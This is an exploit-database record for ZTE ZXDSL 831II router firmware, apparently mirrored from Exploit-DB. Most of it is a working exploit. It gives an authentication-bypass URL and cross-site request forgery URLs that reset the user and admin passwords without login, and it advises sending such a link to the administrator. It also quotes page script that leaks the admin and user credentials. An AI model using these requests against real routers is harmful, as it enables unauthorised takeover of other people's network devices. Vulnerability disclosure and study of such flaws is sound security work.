ID

VAR-E-201111-0085

CVE

EDB ID

18061

TITLE

ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities - Hardware webapps Exploit

DESCRIPTION

ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities. CVE-76925CVE-76924CVE-2012-4746 . webapps exploit for Hardware platform

AFFECTED PRODUCTS

EXPLOIT

# Exploit Title: ZTE ZXDSL 831IIV7.5.0a_Z29_OV Multiple vulnerabilities
# Date: 28 / 10 / 2011 .
# Authors: Mehdi Boukazoula ; Ibrahim Debeche .
# Software Link with patch :
# Version: v 831IIV7.5.0a_Z29_OV
# Tested on: v 831IIV7.5.0a_Z29_OV, May Affect all ZTE routers !!
# Description :

1 - Authentication bypass + Cross Site Request forgery
To bypass authentication go to URL : http://192.168.1.1/accessaccount.cgi
To get request forgery; The attacker can request from his browser without cookie or any authentication, or send link to the Administrator :

USER ACCOUNT : http://192.168.1.1/accessaccount.cgi?usrUserName=user&usrPassword=111111
ADMIN ACCOUNT : http://192.168.1.1/accessaccount.cgi?sysUserName=admin&sysPassword=111111

2 - Script revealing sensitive information on source of page "accessaccount.cgi":

function frmLoad()
{
with ( document.forms.adminaccount ) {
sysUserName.value = 'admin';
sysPassword.value = '43210';
syscfmPwd.value = '43210';

usrUserName.value = 'user';
usrPassword.value = '111111';
usrcfmPwd.value = '111111';
}
}

EXPLOIT LANGUAGE

txt

PRICE

free

TYPE

Multiple Vulnerabilities

CREDITS

mehdi boukazoula

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

2022-07-27T09:24:59.469000+00:00

SOURCES RELEASE DATE